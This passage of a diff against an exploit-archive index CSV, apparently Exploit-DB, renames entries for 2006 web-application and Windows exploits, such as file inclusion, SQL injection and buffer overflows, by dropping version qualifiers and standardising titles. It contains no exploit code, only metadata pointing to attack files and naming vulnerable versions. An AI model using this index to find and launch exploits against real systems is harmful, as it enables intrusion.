Injection",2006-10-30,ajann,asp,webapps,0 2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a (includes/common.php) Remote Code Execution Exploit",2006-10-30,Kacper,php,webapps,0 -2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module <= 1.3.10 File Include Exploit",2006-10-30,Kacper,php,webapps,0 +2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 File Include Exploit",2006-10-30,Kacper,php,webapps,0 2687,platforms/php/webapps/2687.htm,"E Annu 1.0 Login Bypass SQL Injection Exploit",2006-10-30,ajann,php,webapps,0 -2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Include Vulnerabilities",2006-10-30,v1per-haCker,php,webapps,0 -2689,platforms/windows/remote/2689.c,"Novell eDirectory <= 9.0 DHost Remote Buffer Overflow Exploit",2006-10-30,Expanders,windows,remote,0 +2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusion Vulnerabilities",2006-10-30,v1per-haCker,php,webapps,0 +2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 DHost Remote Buffer Overflow Exploit",2006-10-30,Expanders,windows,remote,0 2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80 -2691,platforms/php/webapps/2691.txt,"P-Book <= 1.17 - (pb_lang) Remote File Inclusion Vulnerabilities",2006-10-31,Matdhule,php,webapps,0 -2692,platforms/php/webapps/2692.txt,"GEPI <= 1.4.0 gestion/savebackup.php Remote File Include",2006-10-31,"Sumit Siddharth",php,webapps,0 -2693,platforms/php/webapps/2693.txt,"PwsPHP <= 1.1 - (themes/fin.php) Remote File Include Vulnerablity",2006-10-31,3l3ctric-Cracker,php,webapps,0 -2694,platforms/php/webapps/2694.php,"T.G.S. CMS <= 0.1.7 - (logout.php) Remote SQL Injection Exploit",2006-10-31,Kacper,php,webapps,0 -2695,platforms/multiple/dos/2695.html,"Mozilla Firefox <= 1.5.0.7/2.0 - (createRange) Remote DoS Exploit",2006-10-31,"Gotfault Security",multiple,dos,0 -2696,platforms/php/webapps/2696.php,"Invision Power Board <= 2.1.7 - (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 -2697,platforms/php/webapps/2697.php,"Innovate Portal <= 2.0 - (acp.php) Remote Code Execution Exploit",2006-11-01,Kacper,php,webapps,0 +2691,platforms/php/webapps/2691.txt,"P-Book 1.17 - (pb_lang) Remote File Inclusion Vulnerabilities",2006-10-31,Matdhule,php,webapps,0 +2692,platforms/php/webapps/2692.txt,"GEPI 1.4.0 gestion/savebackup.php Remote File Inclusion",2006-10-31,"Sumit Siddharth",php,webapps,0 +2693,platforms/php/webapps/2693.txt,"PwsPHP 1.1 - (themes/fin.php) Remote File Inclusion Vulnerablity",2006-10-31,3l3ctric-Cracker,php,webapps,0 +2694,platforms/php/webapps/2694.php,"T.G.S. CMS 0.1.7 - (logout.php) SQL Injection Exploit",2006-10-31,Kacper,php,webapps,0 +2695,platforms/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - (createRange) Remote DoS Exploit",2006-10-31,"Gotfault Security",multiple,dos,0 +2696,platforms/php/webapps/2696.php,"Invision Power Board 2.1.7 - (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 +2697,platforms/php/webapps/2697.php,"Innovate Portal 2.0 - (acp.php) Remote Code Execution Exploit",2006-11-01,Kacper,php,webapps,0 2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - (admin/configuration.inc.php) Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 -2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server <= 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0 +2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0 2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption Proof of Concept (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0 2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure",2006-11-01,securfrog,php,webapps,0 -2702,platforms/php/webapps/2702.php,"Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit",2006-11-02,Kacper,php,webapps,0 -2703,platforms/php/webapps/2703.txt,"Article System 0.6 - (volume.php) Remote File Include",2006-11-02,GregStar,php,webapps,0 -2704,platforms/php/webapps/2704.txt,"freewebshop.org script <= 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0 -2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 - (FCKeditor) Remote File Include",2006-11-03,nuffsaid,php,webapps,0 -2707,platforms/php/webapps/2707.php,"PostNuke <= 0.763 - (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0 -2708,platforms/windows/dos/2708.c,"Nullsoft Winamp <= 5.3 - (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0 +2702,platforms/php/webapps/2702.php,"Lithium CMS 4.04c (classes/index.php) Local File Inclusion Exploit",2006-11-02,Kacper,php,webapps,0 +2703,platforms/php/webapps/2703.txt,"Article System 0.6 - (volume.php) Remote File Inclusion",2006-11-02,GregStar,php,webapps,0 +2704,platforms/php/webapps/2704.txt,"freewebshop.org script 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0 +2706,platforms/php/webapps/2706.txt,"MODx CMS 0.9.2.1 - (FCKeditor) Remote File Inclusion",2006-11-03,nuffsaid,php,webapps,0 +2707,platforms/php/webapps/2707.php,"PostNuke 0.763 - (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0 +2708,platforms/windows/dos/2708.c,"Nullsoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0 2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0 -2710,platforms/php/webapps/2710.txt,"Ariadne <= 2.4 - store_config[code] Remote File Include Vulnerabilities",2006-11-04,"Mehmet Ince",php,webapps,0 -2711,platforms/php/webapps/2711.php,"e107 <= 0.75 - (e107language_e107cookie) Local File Include Exploit",2006-11-04,Kacper,php,webapps,0 -2712,platforms/php/webapps/2712.php,"MDPro <= 1.0.76 - (Cookie: PNSVlang) Local File Include Exploit",2006-11-04,Kacper,php,webapps,0 +2710,platforms/php/webapps/2710.txt,"Ariadne 2.4 - store_config[code] Remote File Inclusion Vulnerabilities",2006-11-04,"Mehmet Ince",php,webapps,0 +2711,platforms/php/webapps/2711.php,"e107 <= 0.75 - (e107language_e107cookie) Local File Inclusion Exploit",2006-11-04,Kacper,php,webapps,0 +2712,platforms/php/webapps/2712.php,"MDPro 1.0.76 - (Cookie: PNSVlang) Local File Inclusion Exploit",2006-11-04,Kacper,php,webapps,0 2713,platforms/php/webapps/2713.txt,"Drake CMS < 0.2.3 ALPHA rev.916Remote File Inclusion",2006-11-04,GregStar,php,webapps,0 -2714,platforms/php/webapps/2714.pl,"PHPKIT <= 1.6.1R2 - (search_user) Remote SQL Injection Exploit",2006-11-04,x23,php,webapps,0 -2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server <= 5.2.1 - Remote Denial of Service Exploit",2006-11-04,boecke,windows,dos,0 +2714,platforms/php/webapps/2714.pl,"PHPKIT 1.6.1R2 - (search_user) SQL Injection Exploit",2006-11-04,x23,php,webapps,0 +2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service Exploit",2006-11-04,boecke,windows,dos,0 2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - (GET Request) Remote DoS Exploit",2006-11-04,CorryL,windows,dos,0 -2717,platforms/php/webapps/2717.txt,"phpDynaSite <= 3.2.2 - (racine) Remote File Include Vulnerabilities",2006-11-04,DeltahackingTEAM,php,webapps,0 -2718,platforms/php/webapps/2718.txt,"SazCart <= 1.5 - (cart.php) Remote File Include",2006-11-04,IbnuSina,php,webapps,0 -2719,platforms/php/webapps/2719.php,"Quick.Cms.Lite <= 0.3 - (Cookie sLanguage) Local File Include Exploit",2006-11-05,Kacper,php,webapps,0 -2720,platforms/php/webapps/2720.pl,"PHP Classifieds <= 7.1 - (detail.php) Remote SQL Injection Exploit",2006-11-05,ajann,php,webapps,0 -2721,platforms/php/webapps/2721.php,"Ultimate PHP Board <= 2.0 - (header_simple.php) File Include Exploit",2006-11-05,Kacper,php,webapps,0 +2717,platforms/php/webapps/2717.txt,"phpDynaSite 3.2.2 - (racine) Remote File Inclusion Vulnerabilities",2006-11-04,DeltahackingTEAM,php,webapps,0 +2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - (cart.php) Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0 +2719,platforms/php/webapps/2719.php,"Quick.Cms.Lite 0.3 - (Cookie sLanguage) Local File Inclusion Exploit",2006-11-05,Kacper,php,webapps,0 +2720,platforms/php/webapps/2720.pl,"PHP Classifieds 7.1 - (detail.php) SQL Injection Exploit",2006-11-05,ajann,php,webapps,0 +2721,platforms/php/webapps/2721.php,"Ultimate PHP Board 2.0 - (header_simple.php) File Include Exploit",2006-11-05,Kacper,php,webapps,0 2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0 -2724,platforms/php/webapps/2724.txt,"Soholaunch Pro <= 4.9 r36 - Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0 -2725,platforms/php/webapps/2725.txt,"Cyberfolio <= 2.0 RC1 - (av) Remote File Include Vulnerabilities",2006-11-06,the_day,php,webapps,0 -2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 - (MysqlfinderAdmin.php) Remote File Include",2006-11-06,the_day,php,webapps,0 -2727,platforms/php/webapps/2727.txt,"OpenEMR <= 2.8.1 - (srcdir) Multiple Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0 -2728,platforms/php/webapps/2728.txt,"Article Script <= 1.6.3 - (rss.php) Remote SQL Injection",2006-11-06,Liz0ziM,php,webapps,0 +2724,platforms/php/webapps/2724.txt,"Soholaunch Pro 4.9 r36 - Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0 +2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - (av) Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0 +2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 - (MysqlfinderAdmin.php) Remote File Inclusion",2006-11-06,the_day,php,webapps,0 +2727,platforms/php/webapps/2727.txt,"OpenEMR 2.8.1 - (srcdir) Multiple Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0 +2728,platforms/php/webapps/2728.txt,"Article Script 1.6.3 - (rss.php) SQL Injection",2006-11-06,Liz0ziM,php,webapps,0 2729,platforms/windows/remote/2729.pm,"Omni-NFS Server 5.2 - (nfsd.exe) Remote Stack Overflow Exploit (Metasploit)",2006-11-06,"Evgeny Legerov",windows,remote,2049 2730,platforms/linux/dos/2730.pm,"OpenLDAP 2.2.29 - Remote Denial of Service Exploit (Metasploit)",2006-11-06,"Evgeny Legerov",linux,dos,0 2731,platforms/php/webapps/2731.pl,"iPrimal Forums (admin/index.php) Change User Password Exploit",2006-11-06,Bl0od3r,php,webapps,0 2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 - (CFG_PHPGIGGLE_ROOT) File Include",2006-11-06,ajann,php,webapps,0 -2733,platforms/php/webapps/2733.txt,"iWare Pro <= 5.0.4 - (chat_panel.php) Remote Code Execution",2006-11-07,nuffsaid,php,webapps,0 +2733,platforms/php/webapps/2733.txt,"iWare Pro 5.0.4 - (chat_panel.php) Remote Code Execution",2006-11-07,nuffsaid,php,webapps,0 2734,platforms/windows/dos/2734.py,"WFTPD Pro Server 3.23.1.1 - (APPE) Remote Buffer Overflow PoC",2006-11-07,"Joxean Koret",windows,dos,0 2735,platforms/windows/dos/2735.py,"WarFTPd 1.82.00-RC11 - Remote Denial of Service Exploit",2006-11-07,"Joxean Koret",windows,dos,0 -2736,platforms/php/webapps/2736.txt,"PHPAdventure 1.1 - (ad_main.php) Remote File Include",2006-11-07,HER0,php,webapps,0 -2737,platforms/osx/local/2737.pl,"Xcode OpenBase <= 10.0.0 - (symlink) Local Root Exploit (OSX)",2006-11-08,"Kevin Finisterre",osx,local,0 -2738,platforms/osx/local/2738.pl,"Xcode OpenBase <= 10.0.0 - (unsafe system call) Local Root Exploit (OSX)",2006-11-08,"Kevin Finisterre",osx,local,0 -2739,platforms/php/webapps/2739.txt,"iPrimal Forums (admin/index.php) Remote File Include",2006-11-08,Bl0od3r,php,webapps,0 -2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 - (cfgProgDir) Remote File Include Vulnerabilities",2006-11-08,DeltahackingTEAM,php,webapps,0 -2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 - (inc/irayofuncs.php) Remote File Include",2006-11-08,DeltahackingTEAM,php,webapps,0 -2742,platforms/php/webapps/2742.txt,"DodosMail <= 2.0.1 - (dodosmail.php) Remote File Include",2006-11-08,"Cold Zero",php,webapps,0 +2736,platforms/php/webapps/2736.txt,"PHPAdventure 1.1 - (ad_main.php) Remote File Inclusion",2006-11-07,HER0,php,webapps,0 +2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 - (symlink) Local Root Exploit (OSX)",2006-11-08,"Kevin Finisterre",osx,local,0 +2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 - (unsafe system call) Local Root Exploit (OSX)",2006-11-08,"Kevin Finisterre",osx,local,0 +2739,platforms/php/webapps/2739.txt,"iPrimal Forums (admin/index.php) Remote File Inclusion",2006-11-08,Bl0od3r,php,webapps,0 +2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 - (cfgProgDir) Remote File Inclusion Vulnerabilities",2006-11-08,DeltahackingTEAM,php,webapps,0 +2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 - (inc/irayofuncs.php) Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0 +2742,platforms/php/webapps/2742.txt,"DodosMail 2.0.1 - (dodosmail.php) Remote File Inclusion",2006-11-08,"Cold Zero",php,webapps,0 2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution Exploit",2006-11-08,anonymous,windows,remote,0 -2744,platforms/php/webapps/2744.txt,"LetterIt 2.0 - (inc/session.php) Remote File Include",2006-11-09,v1per-haCker,php,webapps,0 -2745,platforms/php/webapps/2745.txt,"gtcatalog <= 0.9.1 - (index.php) Remote File Include",2006-11-09,v1per-haCker,php,webapps,0 -2746,platforms/asp/webapps/2746.pl,"AspPired2Poll <= 1.0 - (MoreInfo.asp) Remote SQL Injection Exploit",2006-11-09,ajann,asp,webapps,0 -2747,platforms/php/webapps/2747.txt,"MyAlbum <= 3.02 - (language.inc.php) Remote File Inclusion",2006-11-09,"Silahsiz Kuvvetler",php,webapps,0 -2748,platforms/php/webapps/2748.pl,"phpManta <= 1.0.2 - (view-sourcecode.php) Local File Include Exploit",2006-11-09,ajann,php,webapps,0 +2744,platforms/php/webapps/2744.txt,"LetterIt 2.0 - (inc/session.php) Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps,0 +2745,platforms/php/webapps/2745.txt,"gtcatalog 0.9.1 - (index.php) Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps,0 +2746,platforms/asp/webapps/2746.pl,"AspPired2Poll 1.0 - (MoreInfo.asp) SQL Injection Exploit",2006-11-09,ajann,asp,webapps,0 +2747,platforms/php/webapps/2747.txt,"MyAlbum 3.02 - (language.inc.php) Remote File Inclusion",2006-11-09,"Silahsiz Kuvvetler",php,webapps,0 +2748,platforms/php/webapps/2748.pl,"phpManta 1.0.2 - (view-sourcecode.php) Local File Inclusion Exploit",2006-11-09,ajann,php,webapps,0 2749,platforms/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution Exploit (2)",2006-11-10,~Fyodor,windows,remote,0 -2750,platforms/php/webapps/2750.txt,"EncapsCMS 0.3.6 - (core/core.php) Remote File Include",2006-11-10,Firewall,php,webapps,0 -2751,platforms/php/webapps/2751.txt,"BrewBlogger 1.3.1 - (printLog.php) Remote SQL Injection",2006-11-10,"Craig Heffner",php,webapps,0 -2752,platforms/php/webapps/2752.txt,"WORK System E-Commerce <= 3.0.1 - Remote Include",2006-11-10,SlimTim10,php,webapps,0 +2750,platforms/php/webapps/2750.txt,"EncapsCMS 0.3.6 - (core/core.php) Remote File Inclusion",2006-11-10,Firewall,php,webapps,0 +2751,platforms/php/webapps/2751.txt,"BrewBlogger 1.3.1 - (printLog.php) SQL Injection",2006-11-10,"Craig Heffner",php,webapps,0 +2752,platforms/php/webapps/2752.txt,"WORK System E-Commerce 3.0.1 - Remote Include",2006-11-10,SlimTim10,php,webapps,0 2753,platforms/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution Exploit (3)",2006-11-10,M03,windows,remote,0 -2754,platforms/asp/webapps/2754.pl,"NuCommunity 1.0 - (cl_CatListing.asp) Remote SQL Injection Exploit",2006-11-11,ajann,asp,webapps,0 -2755,platforms/asp/webapps/2755.pl,"NuRems 1.0 - (propertysdetails.asp) Remote SQL Injection Exploit",2006-11-11,ajann,asp,webapps,0 -2756,platforms/asp/webapps/2756.txt,"NuStore 1.0 - (Products.asp) Remote SQL Injection",2006-11-11,ajann,asp,webapps,0 -2757,platforms/asp/webapps/2757.pl,"NuSchool 1.0 - (CampusNewsDetails.asp) Remote SQL Injection Exploit",2006-11-11,ajann,asp,webapps,0 -2758,platforms/php/webapps/2758.php,"phpwcms <= 1.2.6 - (Cookie: wcs_user_lang) Local File Include Exploit",2006-11-11,Kacper,php,webapps,0 -2759,platforms/php/webapps/2759.php,"PHPWind <= 5.0.1 - (AdminUser) Remote Blind SQL Injection Exploit",2006-11-12,rgod,php,webapps,0 -2760,platforms/php/webapps/2760.php,"Rama CMS <= 0.68 - (Cookie: lang) Local File Include Exploit",2006-11-12,Kacper,php,webapps,0 -2761,platforms/asp/webapps/2761.pl,"Munch Pro 1.0 - (switch.asp) Remote SQL Injection Exploit",2006-11-12,ajann,asp,webapps,0 -2762,platforms/asp/webapps/2762.asp,"ASPPortal <= 4.0.0 - (default1.asp) Remote SQL Injection Exploit",2006-11-12,ajann,asp,webapps,0 -2763,platforms/asp/webapps/2763.txt,"UStore 1.0 - (detail.asp) Remote SQL Injection",2006-11-12,ajann,asp,webapps,0 -2764,platforms/asp/webapps/2764.txt,"USupport 1.0 - (detail.asp) Remote SQL Injection",2006-11-12,ajann,asp,webapps,0 -2765,platforms/asp/webapps/2765.txt,"UPublisher 1.0 - (viewarticle.asp) Remote SQL Injection",2006-11-12,ajann,asp,webapps,0 -2766,platforms/php/webapps/2766.pl,"CMSmelborp Beta (user_standard.php) Remote File Include Exploit",2006-11-12,DeltahackingTEAM,php,webapps,0 -2767,platforms/php/webapps/2767.txt,"StoryStream 4.0 - (baseDir) Remote File Include Vulnerabilities",2006-11-12,v1per-haCker,php,webapps,0 +2754,platforms/asp/webapps/2754.pl,"NuCommunity 1.0 - (cl_CatListing.asp) SQL Injection Exploit",2006-11-11,ajann,asp,webapps,0 +2755,platforms/asp/webapps/2755.pl,"NuRems 1.0 - (propertysdetails.asp) SQL Injection Exploit",2006-11-11,ajann,asp,webapps,0 +2756,platforms/asp/webapps/2756.txt,"NuStore 1.0 - (Products.asp) SQL Injection",2006-11-11,ajann,asp,webapps,0 +2757,platforms/asp/webapps/2757.pl,"NuSchool 1.0 - (CampusNewsDetails.asp) SQL Injection Exploit",2006-11-11,ajann,asp,webapps,0 +2758,platforms/php/webapps/2758.php,"phpwcms 1.2.6 - (Cookie: wcs_user_lang) Local File Inclusion Exploit",2006-11-11,Kacper,php,webapps,0 +2759,platforms/php/webapps/2759.php,"PHPWind 5.0.1 - (AdminUser) Remote Blind SQL Injection Exploit",2006-11-12,rgod,php,webapps,0 +2760,platforms/php/webapps/2760.php,"Rama CMS 0.68 - (Cookie: lang) Local File Inclusion Exploit",2006-11-12,Kacper,php,webapps,0 +2761,platforms/asp/webapps/2761.pl,"Munch Pro 1.0 - (switch.asp) SQL Injection Exploit",2006-11-12,ajann,asp,webapps,0 +2762,platforms/asp/webapps/2762.asp,"ASPPortal 4.0.0 - (default1.asp) SQL Injection Exploit",2006-11-12,ajann,asp,webapps,0 +2763,platforms/asp/webapps/2763.txt,"UStore 1.0 - (detail.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 +2764,platforms/asp/webapps/2764.txt,"USupport 1.0 - (detail.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 +2765,platforms/asp/webapps/2765.txt,"UPublisher 1.0 - (viewarticle.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 +2766,platforms/php/webapps/2766.pl,"CMSmelborp Beta (user_standard.php) Remote File Inclusion Exploit",2006-11-12,DeltahackingTEAM,php,webapps,0 +2767,platforms/php/webapps/2767.txt,"StoryStream 4.0 - (baseDir) Remote File Inclusion Vulnerabilities",2006-11-12,v1per-haCker,php,webapps,0 2768,platforms/php/webapps/2768.txt,"contentnow 1.30 - (local/upload/delete) Multiple Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0 -2769,platforms/php/webapps/2769.php,"Quick.Cart <= 2.0 - (actions_client/gallery.php) Local File Include Exploit",2006-11-13,Kacper,php,webapps,0 +2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - (actions_client/gallery.php) Local File Inclusion Exploit",2006-11-13,Kacper,php,webapps,0 2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver Probe Response SSID Overflow Exploit (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 Wireless Driver Beacon Rates Overflow Exploit (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 -2772,platforms/asp/webapps/2772.htm,"Online Event Registration <= 2.0 - (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 -2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager <= 1.3 - (default.asp) Login Bypass",2006-11-13,ajann,asp,webapps,0 +2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 +2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - (default.asp) Login Bypass",2006-11-13,ajann,asp,webapps,0 2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - (vir_Login.asp) Remote Login Bypass",2006-11-13,ajann,asp,webapps,0 2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - (installed_config_file) File Include Vulnerabilities",2006-11-13,Firewall,php,webapps,0 2776,platforms/php/webapps/2776.txt,"contentnow 1.30 - (Upload/XSS) Multiple Vulnerabilities",2006-11-14,Timq,php,webapps,0 -2777,platforms/php/webapps/2777.txt,"Aigaion <= 1.2.1 - (DIR) Remote File Include Vulnerabilities",2006-11-14,navairum,php,webapps,0 -2778,platforms/php/webapps/2778.txt,"phpPeanuts 1.3 Beta (Inspect.php) Remote File Include",2006-11-14,"Hidayat Sagita",php,webapps,0 +2777,platforms/php/webapps/2777.txt,"Aigaion 1.2.1 - (DIR) Remote File Inclusion Vulnerabilities",2006-11-14,navairum,php,webapps,0 +2778,platforms/php/webapps/2778.txt,"phpPeanuts 1.3 Beta (Inspect.php) Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps,0 2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - (default.asp) Login ByPass SQL Injection",2006-11-14,ajann,asp,webapps,0 -2780,platforms/asp/webapps/2780.txt,"NetVIOS <= 2.0 - (page.asp) Remote SQL Injection",2006-11-14,ajann,asp,webapps,0 +2780,platforms/asp/webapps/2780.txt,"NetVIOS 2.0 - (page.asp) SQL Injection",2006-11-14,ajann,asp,webapps,0 2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - (XSS/auth bypass) Multiple Vulnerabilities",2006-11-14,"Security Access Point",asp,webapps,0 2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart Remote Login Bypass",2006-11-14,"Security Access Point",asp,webapps,0 -2783,platforms/windows/dos/2783.html,"WinZIP <= 10.0.7245 - (FileView ActiveX Control) Stack Overflow PoC",2006-11-14,prdelka,windows,dos,0 +2783,platforms/windows/dos/2783.html,"WinZIP 10.0.7245 - (FileView ActiveX Control) Stack Overflow PoC",2006-11-14,prdelka,windows,dos,0 2784,platforms/multiple/remote/2784.html,"Links 1.00pre12 - (smbclient) Remote Code Execution Exploit",2006-11-14,"Teemu Salmela",multiple,remote,0 -2785,platforms/windows/remote/2785.c,"WinZIP <= 10.0.7245 - (FileView ActiveX) Remote Buffer Overflow Exploit",2006-11-15,prdelka,windows,remote,0 -2786,platforms/php/webapps/2786.txt,"torrentflux <= 2.2 - (create/exec/delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0 +2785,platforms/windows/remote/2785.c,"WinZIP 10.0.7245 - (FileView ActiveX) Remote Buffer Overflow Exploit",2006-11-15,prdelka,windows,remote,0 +2786,platforms/php/webapps/2786.txt,"torrentflux 2.2 - (create/exec/delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0 2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 - (MKD) Remote Denial of Service Exploit",2006-11-15,"Greg Linares",windows,dos,0 2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 - (libucache.dylib) Privilege Escalation Exploit (OSX)",2006-11-15,"Kevin Finisterre",osx,local,0 2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow Exploit (MS06-070)",2006-11-16,cocoruder,windows,remote,0 -2790,platforms/php/webapps/2790.pl,"Etomite CMS <= 0.6.1.2 - (manager/index.php) Local File Include Exploit",2006-11-16,Revenge,php,webapps,0 +2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - (manager/index.php) Local File Inclusion Exploit",2006-11-16,Revenge,php,webapps,0 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool (download.php) Information Disclosure",2006-11-16,"Craig Heffner",php,webapps,0 -2794,platforms/php/webapps/2794.txt,"mg.applanix <= 1.3.1 - (apx_root_path) Remote File Include Vulnerabilities",2006-11-17,v1per-haCker,php,webapps,0 +2794,platforms/php/webapps/2794.txt,"mg.applanix 1.3.1 - (apx_root_path) Remote File Inclusion Vulnerabilities",2006-11-17,v1per-haCker,php,webapps,0 2795,platforms/php/webapps/2795.txt,"DoSePa 1.0.4 - (textview.php) Information Disclosure",2006-11-17,"Craig Heffner",php,webapps,0 -2796,platforms/php/webapps/2796.php,"miniCWB <= 1.0.0 - (contact.php) Local File Include Exploit",2006-11-17,Kacper,php,webapps,0 -2797,platforms/php/webapps/2797.txt,"Powies pForum <= 1.29a (editpoll.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0 +2796,platforms/php/webapps/2796.php,"miniCWB 1.0.0 - (contact.php) Local File Inclusion Exploit",2006-11-17,Kacper,php,webapps,0 +2797,platforms/php/webapps/2797.txt,"Powies pForum 1.29a (editpoll.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0 2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 - (matchdetail.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0 2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 - (mx_common.php) File Include",2006-11-17,bd0rk,php,webapps,0 2800,platforms/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0 -2807,platforms/php/webapps/2807.pl,"MosReporter Joomla Component 0.9.3 - Remote File Include Exploit",2006-11-17,Crackers_Child,php,webapps,0 -2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a (check_status.php) Remote File Include",2006-11-17,DeltahackingTEAM,php,webapps,0 +2807,platforms/php/webapps/2807.pl,"MosReporter Joomla Component 0.9.3 - Remote File Inclusion Exploit",2006-11-17,Crackers_Child,php,webapps,0 +2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a (check_status.php) Remote File Inclusion",2006-11-17,DeltahackingTEAM,php,webapps,0 2809,platforms/windows/remote/2809.py,"Microsoft Windows NetpManageIPCConnect - Stack Overflow Exploit (Python)",2006-11-18,"Winny Thomas",windows,remote,445 -2810,platforms/php/webapps/2810.php,"Oxygen <= 1.1.3 - (O2PHP Bulletin Board) Remote SQL Injection Exploit",2006-11-18,DarkFig,php,webapps,0 -2811,platforms/php/webapps/2811.txt,"phpWebThings <= 1.5.2 - (editor.php) Remote File Include",2006-11-18,nuffsaid,php,webapps,0 -2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader <= 1.5 - (save.php) Remote Code Execution Exploit",2006-11-18,nuffsaid,php,webapps,0 -2813,platforms/asp/webapps/2813.txt,"ASPNuke <= 0.80 - (register.asp) Remote SQL Injection",2006-11-19,ajann,asp,webapps,0 -2814,platforms/php/webapps/2814.txt,"PHPQuickGallery <= 1.9 - (textFile) Remote File Include",2006-11-19,"Al7ejaz Hacker",php,webapps,0 